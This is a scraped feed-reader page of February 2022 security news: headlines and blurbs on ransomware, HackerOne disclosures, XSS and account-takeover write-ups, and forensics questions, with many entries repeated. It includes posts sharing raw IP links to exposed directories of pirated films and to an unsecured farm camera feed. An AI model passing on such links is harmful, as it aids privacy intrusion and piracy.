    SecWiki News 2022-02-15 Review
    终极Java反序列化Payload缩小技术 by ourren 求解网络安全问题的可解释机器学习 by ourren 从一例 Pegasus 误报说开去 by Avenger 绕过污点分析的一些思考 by ourren 2021网络金融黑产研究报告 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Question: Different imaging tools for acquisition
    I'm very new to computer forensics. Right now I'm exploring different data acquisition tools. I tried to image a usb device using FTK Imager (on a Windows system) and dd from the SIFT workstation (linux). I noticed that: 1. These two imaging tools provide image data of different sizes. 2. FTK automatically verifies the hash of the device and the image - both hashes were the same. 3. For the dd image, I verified it by myself and they were the same. I have few questions: 1. Why is the hash of the same device different on FTK (running on windows) and when checking on the SIFT Workstation (linux) ? 2. If different tools provide different images, do analysts use a combination of multiple tools? 3. I read about write blockers, I did not use one while imaging, could the difference be because of this? I'd be grateful if you could help me understand more about this process by answering my questions or sharing more resources that I could use. Thanks! submitted by /u/nybble04 [link] [comments]  ( 4 min )
    Overview of autopsy data artifacts, analysis results, and reporting. Part 2 of the autopsy series. nmap usage investigation as a case study.
    submitted by /u/DFIRScience [link] [comments]  ( 1 min )
    iCloud forensics
    Anyone has any experience recovering permanently deleted iCloud data using Cellebrite? Or any other forensic tools ? submitted by /u/Techn0prince [link] [comments]  ( 2 min )
    ENCE Certification
    Hi all, My Ence cert is up in April 22 and I would like to maintain accreditation. Unfortunately my role has a focus towards E-Discovery and not so much digital forensics so I may struggle to get aid from my employer re training and financing. Anyone have experience renewing? Are there any requirements for renewal? As I am likely having to purchase the training myself I don't want the training to be too expensive (particularly as it's not a skill I use day to day). I would likely benefit the most from Cellebrite or AXIOM training. TIA submitted by /u/Genzlol [link] [comments]  ( 1 min )
  • Open

    New Emotet Infection Method
    A new Emotet infection method uses an obfuscated Excel 4.0 macro that, when activated, leads to the retrieval and execution of the final Emotet payload. The post New Emotet Infection Method appeared first on Unit42.
  • Open

    专访极盾技术总监郑冬东:大火的XDR能给企业带来什么?
    XDR安全技术的魅力究竟在哪里,被众人寄予厚望的XDR技术能否解决哪些难题?  ( 1 min )
    FreeBuf早报 | 美国关基组织又遭勒索软件入侵;欧洲央行要求各银行加强网络防御
    在乌克兰危机加剧之际,欧洲央行警告各银行可能受到与俄罗斯有关的网络攻击,要求各银行加强网络防御。  ( 1 min )
    2021 网络金融黑产研究报告
    随着新一轮金融科技的发展与产业的变革,金融行业加快了数字化转型的步伐,灵活与便捷的金融业务模式在为用户提供更加优质的金融服务的同时,也面临着来自黑产不断演变迭代的各类新型攻击威胁。  ( 1 min )
    美国一公司暴露了 700 万用户数据
    一个存在安全风险的Amazon S3存储桶中,包含约700万人的个人数据信息。  ( 1 min )
    体育品牌美津浓遭勒索软件攻击致订单延期
    运动设备与服装品牌美津浓(Mizuno)在2月4日遭受了一次勒索软件攻击。这次攻击严重地导致公司业务中断。
    欧洲最大汽车经销商遭遇勒索攻击、谷歌紧急修复零日漏洞|2月15日全球网络安全热点
    欧洲最大的汽车经销商之一埃米尔·弗雷(Emil Frey)上个月遭到勒索软件攻击,这家瑞士公司于2月1日出现在Hive勒索软件的受害者名单上。  ( 1 min )
    关于CIS 2021 Spring·春日版活动形式调整的公告
    结合线下与线上新玩法,CIS 2021春日版与您不见不散。  ( 1 min )
    《网络安全审查办法》今日施行,百万信息级平台国外上市需审查
    新修订的《网络安全审查办法》以关键信息基础设施的供应链安全为核心,重点加强对数据安全的关注和规范。
    谷歌Chrome紧急修复了在攻击中被利用的零日漏洞
    Google发布了适用于Windows、Mac和Linux的Chrome,以修复威胁参与者在攻击中使用的高严重性零日漏洞。
    CISA 在其已知利用漏洞目录中新增15个新漏洞
    美国网络安全与基础设施安全局(CISA)在“已知被利用漏洞目录”中又增加了15个漏洞。  ( 1 min )
    FBI:BlackByte 勒索软件已入侵美国关键基础设施
    美国联邦调查局与美国特勤局发布联合网络安全咨询公告,显示BlackByte 勒索软件组织在过去3个月中入侵了至少3 个美国关键基础设施。  ( 1 min )
  • Open

    Cross-origin resource sharing
    Showmax disclosed a bug submitted by qualin: https://hackerone.com/reports/1478449 - Bounty: $50
    When sharing a Deck card in conversation the metaData can be manipulated to open arbitrary URL
    Nextcloud disclosed a bug submitted by ctulhu: https://hackerone.com/reports/1358977 - Bounty: $100
    Ability to Disable the Login Attempt of any Shopify Owner for 24 hrs (Zero_Click)
    Shopify disclosed a bug submitted by saurabhsankhwar3: https://hackerone.com/reports/1406495 - Bounty: $900
  • Open

    JDBC Connection URL 攻击
    作者:su18 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 当一个 JDBC 连接 URL 可控时,能造成什么影响?相关的若干攻击方法已经被披露很长时间了,但是我还一直都没有学习,随着 HITB2021SIN 中的分享议题 "Make JDBC Attacks Brilliant Again" 的视频上传到了 Y...
    JDBC Connection URL 攻击
    作者:su18 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 当一个 JDBC 连接 URL 可控时,能造成什么影响?相关的若干攻击方法已经被披露很长时间了,但是我还一直都没有学习,随着 HITB2021SIN 中的分享议题 "Make JDBC Attacks Brilliant Again" 的视频上传到了 Y...
    RedLine Stealer 伪装成 Windows 11 更新程序,窃取用户信息
    译者:知道创宇404实验室翻译组 原文链接:https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/ 黑客总是在寻找热门诱饵,以诱骗受害者进入感染系统。我们最近分析了一个这样的诱饵,即一个伪造的 Windows 11安装程序。2022年1月27日,也就是 Windows 11升级最...
    RedLine Stealer 伪装成 Windows 11 更新程序,窃取用户信息
    译者:知道创宇404实验室翻译组 原文链接:https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/ 黑客总是在寻找热门诱饵,以诱骗受害者进入感染系统。我们最近分析了一个这样的诱饵,即一个伪造的 Windows 11安装程序。2022年1月27日,也就是 Windows 11升级最...
  • Open

    JDBC Connection URL 攻击
    作者:su18 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 当一个 JDBC 连接 URL 可控时,能造成什么影响?相关的若干攻击方法已经被披露很长时间了,但是我还一直都没有学习,随着 HITB2021SIN 中的分享议题 "Make JDBC Attacks Brilliant Again" 的视频上传到了 Y...
    JDBC Connection URL 攻击
    作者:su18 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 当一个 JDBC 连接 URL 可控时,能造成什么影响?相关的若干攻击方法已经被披露很长时间了,但是我还一直都没有学习,随着 HITB2021SIN 中的分享议题 "Make JDBC Attacks Brilliant Again" 的视频上传到了 Y...
    RedLine Stealer 伪装成 Windows 11 更新程序,窃取用户信息
    译者:知道创宇404实验室翻译组 原文链接:https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/ 黑客总是在寻找热门诱饵,以诱骗受害者进入感染系统。我们最近分析了一个这样的诱饵,即一个伪造的 Windows 11安装程序。2022年1月27日,也就是 Windows 11升级最...
    RedLine Stealer 伪装成 Windows 11 更新程序,窃取用户信息
    译者:知道创宇404实验室翻译组 原文链接:https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/ 黑客总是在寻找热门诱饵,以诱骗受害者进入感染系统。我们最近分析了一个这样的诱饵,即一个伪造的 Windows 11安装程序。2022年1月27日,也就是 Windows 11升级最...
  • Open

    Pretty decent collection of movies that is well organized (as well as software and other stuff)
    ​ http://162.12.215.254/Data/ I was looking for the movies and the English ones are mostly good quality, and without any burned in subs or forced dual languages. ​ Sorry if repost. Found searching, "English" in search box with "video" in ['filegroup or ext'] box on eyedex.org submitted by /u/Rest-in-Peep [link] [comments]  ( 1 min )
    First contribution
    https://who.4386.ltd/Doctor/ I think all marvel files are in 4K. there are more movies in the "movies for" tab. https://who.4386.ltd/Heng/ P.S. the site is in chinese so let chrome translate the page first. submitted by /u/CompetitiveMango12 [link] [comments]  ( 1 min )
  • Open

    TryHackme Principles of Security
    Hello, Amazing hackers in this blog you are gonna see about principles of security.  ( 3 min )
    Pentesting Fundamentals Tryhackme
    Hi, Amazing Hackers today I come up with another interesting topic on Tryhackme which is Pentesting Fundamental.  ( 3 min )
    Hackeando Wordle
    Cómo adivinar la palabra del día a través de ingeniería inversa Continue reading on InfoSec Write-ups »  ( 4 min )
    A tale of 0-Click Account Takeover and 2FA Bypass.
    Hey, it’s been a long time since I published a bug bounty write-up. I was in an internship period. So, I had a lot of free time. Anyways…  ( 4 min )
    How I was able to take over any account via the Password Reset Functionality.
    Hey, This is my first writeup and I will talk about an account takeover that I found in May on a vulnerability disclosure program. Let’s…  ( 4 min )
  • Open

    TryHackme Principles of Security
    Hello, Amazing hackers in this blog you are gonna see about principles of security.  ( 3 min )
    Pentesting Fundamentals Tryhackme
    Hi, Amazing Hackers today I come up with another interesting topic on Tryhackme which is Pentesting Fundamental.  ( 3 min )
    Hackeando Wordle
    Cómo adivinar la palabra del día a través de ingeniería inversa Continue reading on InfoSec Write-ups »  ( 4 min )
    A tale of 0-Click Account Takeover and 2FA Bypass.
    Hey, it’s been a long time since I published a bug bounty write-up. I was in an internship period. So, I had a lot of free time. Anyways…  ( 4 min )
    How I was able to take over any account via the Password Reset Functionality.
    Hey, This is my first writeup and I will talk about an account takeover that I found in May on a vulnerability disclosure program. Let’s…  ( 4 min )
  • Open

    TryHackme Principles of Security
    Hello, Amazing hackers in this blog you are gonna see about principles of security.  ( 3 min )
    Pentesting Fundamentals Tryhackme
    Hi, Amazing Hackers today I come up with another interesting topic on Tryhackme which is Pentesting Fundamental.  ( 3 min )
    Hackeando Wordle
    Cómo adivinar la palabra del día a través de ingeniería inversa Continue reading on InfoSec Write-ups »  ( 4 min )
    A tale of 0-Click Account Takeover and 2FA Bypass.
    Hey, it’s been a long time since I published a bug bounty write-up. I was in an internship period. So, I had a lot of free time. Anyways…  ( 4 min )
    How I was able to take over any account via the Password Reset Functionality.
    Hey, This is my first writeup and I will talk about an account takeover that I found in May on a vulnerability disclosure program. Let’s…  ( 4 min )

  • Open

    “That SweetPot of Data Net-tar” My first Honey Pot Walkthrough Part 3
    Part 1 Continue reading on Medium »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 11
    Once again I am back with a walkthrough to a GEOINT challenge. I will be explaining how to solve Geolocation 11 practice test on… Continue reading on InfoSec Write-ups »  ( 5 min )
    Walkthrough — Hacktoria: Geolocation 11
    Once again I am back with a walkthrough to a GEOINT challenge. I will be explaining how to solve Geolocation 11 practice test on… Continue reading on Medium »  ( 5 min )
    I Too Want a Key Collection — OSINT Challenge 15
    On Jan 20, 2022, Quiztime (contributor @twone2) shared a new OSINT quiz with us. The objective was simple. We had to figure out when the… Continue reading on Medium »  ( 2 min )
    How To Find Your Data In Web With Pimeyes And Other Reverse Tools
    Reverse Image Search is a web-based tool for finding identical and similar images related to the image you are looking for. Marketers can… Continue reading on Medium »  ( 2 min )
  • Open

    The Unobvious About XSS and HTML Encoding
    Many people know that before getting the value of a tag attribute, the browser decodes the HTML entities inside. Let’s say if you try to… Continue reading on Medium »  ( 2 min )
    How to get into bug bounties — A list of resources by The XSS Rat
    Hello friends, I’ve seen this question come by often so I’ve decided to try and group all the resources of myself that I have about… Continue reading on Medium »
    What is the Bug Bounty ?
    Often translated into French as “prime au bogue” or “bounty for the detected flaw”, the bug bounty appeared in the 90s within Netscape… Continue reading on CyberSecurity and GDPR compliance »  ( 3 min )
    Research on Clickjacking & Network Sniffing- Cyber Sapiens Internship Task-14
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 4 min )
    How I did Full Account Takeover (FATO) using forgot password link?
    How I was able to takeover admin account by exploiting forgot password functionality. Continue reading on Medium »  ( 2 min )
    Broken Access Control Overview
    As I was going through web application vulnerabilities during my 100 days of hacking, I came across this interesting topic Broken Access… Continue reading on Medium »  ( 1 min )
    BigQuery SQL Injection Cheat Sheet
    Last year, we (My researcher partner on this topic, Anil and me) and found a SQL injection vulnerability on a target at Synack which was… Continue reading on Medium »  ( 5 min )
    Bug Bounty — Bypassing Endpoints
    Hello there, let’s discuss on how to bypass endpoints. Before moving further, let’s take a quick glance about endpoints. Continue reading on Medium »  ( 2 min )
    My First Bounty and How I Got It
    Hello!! This is my first article, and I really hope you enjoy it! From June 2021, I began looking for issues on the websites. Continue reading on Medium »  ( 1 min )
    Javascript Security — Weak Type Bypass
    As you may know, Javascript is a weakly typed language. This features of the language can be used by hackers to bypass some checks within… Continue reading on Medium »  ( 1 min )
  • Open

    PrivateLoader to new Anubis Loader
    submitted by /u/sysopfb [link] [comments]
    Eliminating Dangling Elastic IP Takeovers with Ghostbuster
    submitted by /u/Mempodipper [link] [comments]
    Persistence – Notepad++ Plugins
    submitted by /u/netbiosX [link] [comments]  ( 1 min )
    Multiple vulnerabilities in Concrete CMS part2 (Privesc/SSRF/etc.)
    submitted by /u/adrian_rt [link] [comments]
    Dropping Files on a Domain Controller Using CVE-2021-43893
    submitted by /u/chicksdigthelongrun [link] [comments]
    MyloBot 2022 – Analysis of the new version of this evasive botnet that appears to just send extortion emails, but has the potential to do much more.
    submitted by /u/woja111 [link] [comments]  ( 1 min )
  • Open

    Arbitrary File Read at via filename parameter
    U.S. Dept Of Defense disclosed a bug submitted by shiar: https://hackerone.com/reports/1436223
    Broken Authentication
    U.S. Dept Of Defense disclosed a bug submitted by websecnl: https://hackerone.com/reports/409237
    IDOR
    U.S. Dept Of Defense disclosed a bug submitted by websecnl: https://hackerone.com/reports/389250
    CUI Labelled document out in the open
    U.S. Dept Of Defense disclosed a bug submitted by pll25: https://hackerone.com/reports/1436460
    EC2 subdomain takeover at http:///
    U.S. Dept Of Defense disclosed a bug submitted by dreyand72: https://hackerone.com/reports/1296366
    XSS trigger via HTML Iframe injection in ( https:// ) due to unfiltered HTML tags
    U.S. Dept Of Defense disclosed a bug submitted by rozerx00: https://hackerone.com/reports/1200770
    Reflected XSS at https:// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457277
    Reflected XSS at https:// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457546
    Reflected XSS at https:/// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457493
    Reflected XSS at https:/// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457444
    Reflected XSS at https:/// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457413
    (CORS) Cross-origin resource sharing misconfiguration on https://
    U.S. Dept Of Defense disclosed a bug submitted by fiveguyslover: https://hackerone.com/reports/995144
    default creds on https://
    U.S. Dept Of Defense disclosed a bug submitted by pirateducky: https://hackerone.com/reports/711662
    Unauthorized access to PII leads to MASS account Takeover
    U.S. Dept Of Defense disclosed a bug submitted by takester: https://hackerone.com/reports/1061736
    RXSS ON https://
    U.S. Dept Of Defense disclosed a bug submitted by iam_a_jinchuriki: https://hackerone.com/reports/1244145
    [CVE-2020-3452] Unauthenticated file read in Cisco ASA
    U.S. Dept Of Defense disclosed a bug submitted by ghostxsec: https://hackerone.com/reports/1415825
  • Open

    Preventing Replay Attacks
    Hey all, I'm going to be participating in an Attack/Defend CTF, and apparently one of the biggest vulnerabilities from previous competitions was replay attacks. Some more details: The server that is traditionally vulnerable to replay attacks is a headless Arch Linux box with limited disk space and no access to the Internet. I have superuser access this box via SSH; This server exists outside of our defensive LAN. Its sole responsibility is relaying commands to/from external entities. Think like a self-driving Tesla car being told what to do: "Turn left, turn left, turn left...". I should underscore that if an attacker replayed these commands, the car would inevitably crash. I've configured the IPtables on the box to: Drop invalid traffic; Accept existing traffic; Accept SSH from our administrative workstation; Accept commands from our client workstation; Forward traffic to the external entities; and Drop everything else. I want to inquire about any lightweight transport layer security options that I could implement to secure the bidirectional communication. I'm exploring IPsec/VPNs but I haven't found success. I just wanted to ask if I was missing anything simple here. Thank you for your time. submitted by /u/InfamousClyde [link] [comments]  ( 1 min )
    Alienvault OSSIM OTX Issue
    So I just set up a new OSSIM instance from scratch. I've added my API key (and have subsequently regenerated new ones for troubleshooting). I'm not sure how long I have to wait for the OTX subscriptions to sync and download to the OSSIM client, but when I click the dropdown on the OTX page in OSSIM, and click on View Account Details, it takes me to the otx.alienvault.com webpage, and shows that I'm not following or subscribed to any pulses.. However, if I log into OTX with the same account, it shows that I am subscribed to several. I've ran the 'curl' command to test the OTX-API key and it worked without error. I've also noticed that another alarm I am receiving is "no information available. you are no longer subscribed to this pulse" but there is no information as to what pulse they're referring to. And googling it found an Alienvault KB that said it was fixed in 5.4. I'm on 5.8 (the latest version, up to date as well). ​ Anyone else having this issue with Alienvault OSSIM and OTX not syncing? If there's a command to force sync (I've done the option in the console for updating the threat feeds), that would be appreciated. submitted by /u/Phyxiis [link] [comments]  ( 1 min )
    Building a forensics lab - what are must haves? Any templates?
    We have some spare resources and we're looking to build a dedicated forensics, analysis lab. We have a couple poweredges we can use. The current plan is a segregated environment to clone suspect machines and see how they interact and do whatever analysis is required. I don't really know where to start expect segregating it or having a faux network connection. It seems a lot of people just run labs locally, however we're required to essentially have thin clients. What have your team built for this? Any must have tools? submitted by /u/idnUygelps [link] [comments]  ( 3 min )
    What are the Open Source Tools Network Scanning Tools?
    We are a medium size healthcare medical center, maybe 300 nodes. What are the available open source /free tools I can use to achieve this use case ? Scanner that will say “2 new systems in this". Results should give me the OS version and check if antivirus is installed. submitted by /u/techno_it [link] [comments]  ( 1 min )
    Using Tomcat Virtual Host Manager
    I found access to Tomcat Virtual Host Manager on Tomcat 9 (not the one that deploys WAR files) which according to docs means the account has the role "admin-gui". I've been asked if I can pivot further using this but I'm completely stuck because I've never used it. All I can use is a form which can "Add Virtual Host" but from my testing (and limited experience with Tomcat) I've run into a halt. Anyone know if this can be used to privesc? submitted by /u/plutofoxtrot [link] [comments]  ( 1 min )
    LastPass free account with yubikey?
    Lastpass free account by default doesn't support Yubikey. But lastpass support Google auth. In theory, they are all compatible because of the same protocol. Can I just set select "Google Auth." then go ahead and use my Yubico auth. app? Thanks. Anyone has experience? submitted by /u/mk_life [link] [comments]  ( 1 min )
  • Open

    Check Out The Full Speaker Line-Up of IWCON 2022
    Book your seats for the coolest, most value-packed cybersecurity event of 2022!  ( 2 min )
    Intigriti’s February XSS Challenge Walkthrough
    Today, I will be sharing about my solution on Intigriti’s February XSS Challenge 0222  ( 4 min )
    TryHackMe: Gallery
    Walkthrough  ( 3 min )
    Phishing Emails and Malware Traffic Analysis
    In this article, I use NetworkMiner, Wireshark and Hybrid-Analysis to analyze several malicious emails and a PCAP file that captured…  ( 11 min )
    Security Awareness — TryHackme
    You will understand what is security awareness and the importance of it  ( 2 min )
    Day 23 Cross-Site Scripting - Part 2#100DaysofHacking
    Get all the writeups from Day 1 to 21, Click Here Or Click Here.  ( 2 min )
    Hacking AWS Cognito Misconfiguration to Zero Click Account Takeover
    Hi all, hope you are keeping well and staying safe. This blog is about my recent Account Takeover finding. Continue reading on InfoSec Write-ups »  ( 4 min )
    Cyborg | TryHackMe Walkthrough
    Hack the backup file  ( 3 min )
    [Day 8] Special by John Hammond Santa’s Bag of Toys | Advent of Cyber 3 (2021)
    We will be learn about a little bit of Forensics Analysis in Windows.  ( 5 min )
    Install Invisible Malicious Apps Remotely, Acting As Updates
    Use Flickr app to install malicious apps remotely acting as updates. Continue reading on InfoSec Write-ups »  ( 3 min )
  • Open

    Check Out The Full Speaker Line-Up of IWCON 2022
    Book your seats for the coolest, most value-packed cybersecurity event of 2022!  ( 3 min )
    Intigriti’s February XSS Challenge Walkthrough
    Today, I will be sharing about my solution on Intigriti’s February XSS Challenge 0222  ( 4 min )
    TryHackMe: Gallery
    Walkthrough  ( 3 min )
    Phishing Emails and Malware Traffic Analysis
    In this article, I use NetworkMiner, Wireshark and Hybrid-Analysis to analyze several malicious emails and a PCAP file that captured…  ( 11 min )
    Security Awareness — TryHackme
    You will understand what is security awareness and the importance of it  ( 2 min )
    Day 23 Cross-Site Scripting - Part 2#100DaysofHacking
    Get all the writeups from Day 1 to 21, Click Here Or Click Here.  ( 2 min )
    Hacking AWS Cognito Misconfiguration to Zero Click Account Takeover
    Hi all, hope you are keeping well and staying safe. This blog is about my recent Account Takeover finding. Continue reading on InfoSec Write-ups »  ( 4 min )
    Cyborg | TryHackMe Walkthrough
    Hack the backup file  ( 3 min )
    [Day 8] Special by John Hammond Santa’s Bag of Toys | Advent of Cyber 3 (2021)
    We will be learn about a little bit of Forensics Analysis in Windows.  ( 5 min )
    Install Invisible Malicious Apps Remotely, Acting As Updates
    Use Flickr app to install malicious apps remotely acting as updates. Continue reading on InfoSec Write-ups »  ( 3 min )
  • Open

    Check Out The Full Speaker Line-Up of IWCON 2022
    Book your seats for the coolest, most value-packed cybersecurity event of 2022!  ( 3 min )
    Intigriti’s February XSS Challenge Walkthrough
    Today, I will be sharing about my solution on Intigriti’s February XSS Challenge 0222  ( 4 min )
    TryHackMe: Gallery
    Walkthrough  ( 3 min )
    Phishing Emails and Malware Traffic Analysis
    In this article, I use NetworkMiner, Wireshark and Hybrid-Analysis to analyze several malicious emails and a PCAP file that captured…  ( 11 min )
    Security Awareness — TryHackme
    You will understand what is security awareness and the importance of it  ( 2 min )
    Day 23 Cross-Site Scripting - Part 2#100DaysofHacking
    Get all the writeups from Day 1 to 21, Click Here Or Click Here.  ( 2 min )
    Hacking AWS Cognito Misconfiguration to Zero Click Account Takeover
    Hi all, hope you are keeping well and staying safe. This blog is about my recent Account Takeover finding. Continue reading on InfoSec Write-ups »  ( 4 min )
    Cyborg | TryHackMe Walkthrough
    Hack the backup file  ( 3 min )
    [Day 8] Special by John Hammond Santa’s Bag of Toys | Advent of Cyber 3 (2021)
    We will be learn about a little bit of Forensics Analysis in Windows.  ( 5 min )
    Install Invisible Malicious Apps Remotely, Acting As Updates
    Use Flickr app to install malicious apps remotely acting as updates. Continue reading on InfoSec Write-ups »  ( 3 min )
  • Open

    Dropping Files on a Domain Controller Using CVE-2021-43893
    submitted by /u/dmchell [link] [comments]
    cube0x0/KrbRelay: Framework for Kerberos relaying
    submitted by /u/dmchell [link] [comments]
    Persistence – Notepad++ Plugins
    submitted by /u/netbiosX [link] [comments]
    Install Invisible Malicious Apps Remotely, Acting As Updates
    submitted by /u/banginpadr [link] [comments]
    How I Hacked A Reputed Hacker
    submitted by /u/banginpadr [link] [comments]
  • Open

    Preventing, Detecting, & Hunting for Exploitation of the Log4j 2 Vulnerability
    Article URL: https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/ Comments URL: https://news.ycombinator.com/item?id=30335183 Points: 2 # Comments: 0  ( 28 min )
  • Open

    aimbot idea?
    I was thinking that what if there was a type of screen reader or something like that that detected enemy characters in a video game and locked your mouse to it? is that even possible? just an idea I don't know the technicalities submitted by /u/mr_killlerrrrr [link] [comments]  ( 1 min )
  • Open

    Netsparker Enterprise achieves WCAG 2.1 accessibility compliance
    Invicti is proud to break down barriers of access in software. Learn more about how we’ve achieved WCAG 2.1 AA compliance for accessibility standards. READ MORE  ( 3 min )
  • Open

    Dropping Files on a Domain Controller Using CVE-2021-43893
    Article URL: https://www.rapid7.com/blog/post/2022/02/14/dropping-files-on-a-domain-controller-using-cve-2021-43893/ Comments URL: https://news.ycombinator.com/item?id=30333641 Points: 2 # Comments: 0  ( 14 min )
    CVE-2021-23567
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-23567 Comments URL: https://news.ycombinator.com/item?id=30328625 Points: 4 # Comments: 4  ( 4 min )
  • Open

    SecWiki News 2022-02-14 Review
    SecWiki周刊(第415期) by ourren Java安全研究与安全开发面试题总结 by ourren 记一次挖矿病毒的应急响应 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-02-14 Review
    SecWiki周刊(第415期) by ourren Java安全研究与安全开发面试题总结 by ourren 记一次挖矿病毒的应急响应 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    What are The Red Team and Blue Team in Cyber Security?
    The red team comprises offensive security experts that attempt to attack the cybersecurity defenses of an organization. On the other hand… Continue reading on Medium »  ( 1 min )
  • Open

    Small Business DFIR Services
    Hey all, I wanted to discuss something with this community. Recently I got an ask to recommendation DFIR services for a small business (<50 employees) after they were hacked. I started thinking and realized their was not any business I knew of to help small businesses. ​ First, if anyone knows of a US-based company for DFIR services I would appreciate a suggestion. ​ Second, I do not believe there is any low-cost DFIR company that is meant for small (or medium-sized) business. So, what do you think it would take for these large consulting firms- or even a government service to provide accessible services to any small business that doesn't have the capital to hire the larger cybersecurity or consulting firms? I.e. Create a special LICENSE on open source projects, organize a non for-profit with rotating analysts, pro-bono cyber, etc. submitted by /u/Jklm264 [link] [comments]  ( 7 min )
  • Open

    Persistence – Notepad++ Plugins
    It is not uncommon a windows environment especially dedicated servers which are managed by developers or IT staff to have installed the Notepad++ text editor.… Continue reading → Persistence – Notepad++ Plugins  ( 5 min )
    Persistence – Notepad++ Plugins
    It is not uncommon a windows environment especially dedicated servers which are managed by developers or IT staff to have installed the Notepad++ text editor.… Continue reading → Persistence – Notepad++ Plugins  ( 5 min )
  • Open

    Persistence – Notepad++ Plugins
    It is not uncommon a windows environment especially dedicated servers which are managed by developers or IT staff to have installed the Notepad++ text editor.… Continue reading → Persistence – Notepad++ Plugins  ( 5 min )
    Persistence – Notepad++ Plugins
    It is not uncommon a windows environment especially dedicated servers which are managed by developers or IT staff to have installed the Notepad++ text editor.… Continue reading → Persistence – Notepad++ Plugins  ( 5 min )
  • Open

    BotenaGo 僵尸网络源码泄露,攻击者武器库又增加
    2021 年 11 月,AT&T Alien Labs 首次披露 Golang 编写的恶意软件 BotenaGo。最近,该恶意软件的源代码被上传到 GitHub 上,这可能会催生更多的恶意软件变种。  ( 1 min )
    FritzFrog 疯狂扩张,近四成受害者在中国
    FritzFrog 主要通过 SSH 爆破进行传播,爆破成功后部署恶意软件。研究人员发现,FritzFrog 大约 37% 的失陷主机位于中国。  ( 1 min )
    FreeBuf早报 | 修订后的《网络安全审查办法》今日施行;知乎称未使用行为感知系统监测员工
    知乎表示,对于违规收集个人信息安全的行为,本身严重背离知乎价值观,对这类系统我们一向持坚决反对态度。  ( 1 min )
    超6.02亿美元!2021年勒索软件获得赎金创新高
    调查显示,2021年全球范围内勒索软件威胁正持续增加。全球的组织、机构在过去一年共支付了超6亿美元的加密货币。
    一份解密的文件披露,中央情报局正秘密搜集美国本土公民信息
    根据2月10日解密的一份文件,美国中央情报局在未经国会允许的情况下,一直秘密地搜集美国本土公民数据。  ( 1 min )
    Apple 修复了新的“零日”漏洞
    苹果公司已经成功修复一个新的WebKit零日漏洞。  ( 1 min )
    2021年全球一半的电子邮件是垃圾邮件
    根据卡巴斯基的最新报告,去年超过一半的邮件是垃圾邮件  ( 1 min )
    喜茶安全部门全部被裁,元芳你怎么看?
    安全部门是如此不受重视,当企业经营出现问题时,几乎是第一个被裁掉,以此降低企业经营成本。  ( 1 min )
    如何做好安全研发人才招聘之团队模型的建立
    网络安全科技企业,最宝贵的就是人才。一般来说,企业70%左右的成本都是人力成本,没有合适的人,一切远大的科技理想都是镜中花  ( 1 min )
  • Open

    grave headstones
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Cams at an Asian hog farm
    http://27.156.152.250:8889/ If you're lucky you'll see the grumpy old farmer. Warning, possibly some dead animals and cruelty. -edit submitted by /u/inoculatemedia [link] [comments]
  • Open

    ModifiedElephant:十年潜伏,印度黑客组织浮出水面
    译者:知道创宇404实验室翻译组 原文链接:https://assets.sentinelone.com/sentinellabs-apt/modified-elephant-apt 摘要 我们的研究将这十年的活动迹象归因于一种我们称之为ModifiedElephant的黑客组织。 ModifiedElephant对印度各地的人权活动家、人权捍卫者、学者和律师进行有针对性的攻击,目...
    ModifiedElephant:十年潜伏,印度黑客组织浮出水面
    译者:知道创宇404实验室翻译组 原文链接:https://assets.sentinelone.com/sentinellabs-apt/modified-elephant-apt 摘要 我们的研究将这十年的活动迹象归因于一种我们称之为ModifiedElephant的黑客组织。 ModifiedElephant对印度各地的人权活动家、人权捍卫者、学者和律师进行有针对性的攻击,目...
  • Open

    ModifiedElephant:十年潜伏,印度黑客组织浮出水面
    译者:知道创宇404实验室翻译组 原文链接:https://assets.sentinelone.com/sentinellabs-apt/modified-elephant-apt 摘要 我们的研究将这十年的活动迹象归因于一种我们称之为ModifiedElephant的黑客组织。 ModifiedElephant对印度各地的人权活动家、人权捍卫者、学者和律师进行有针对性的攻击,目...
    ModifiedElephant:十年潜伏,印度黑客组织浮出水面
    译者:知道创宇404实验室翻译组 原文链接:https://assets.sentinelone.com/sentinellabs-apt/modified-elephant-apt 摘要 我们的研究将这十年的活动迹象归因于一种我们称之为ModifiedElephant的黑客组织。 ModifiedElephant对印度各地的人权活动家、人权捍卫者、学者和律师进行有针对性的攻击,目...

  • Open

    Intigriti XSS Challenge 0222 — Write-Up
    XSS challenge by intigriti Solved by Th3Mind Continue reading on Medium »  ( 3 min )
    Intigriti’s February XSS Challenge Walkthrough
    Today, I will be sharing about my solution on Intigriti’s February XSS Challenge 0222 Continue reading on InfoSec Write-ups »
    #Bug Bounty - How I was able to purchased premium feature just for “1” PKR by (Parameter…
    Price Manipulation Continue reading on Medium »  ( 1 min )
    100 Days of Hacking — DAY 9
    Objectives of day 9 : Continue reading on Medium »  ( 1 min )
    Install LinkFinder on Kali Linux
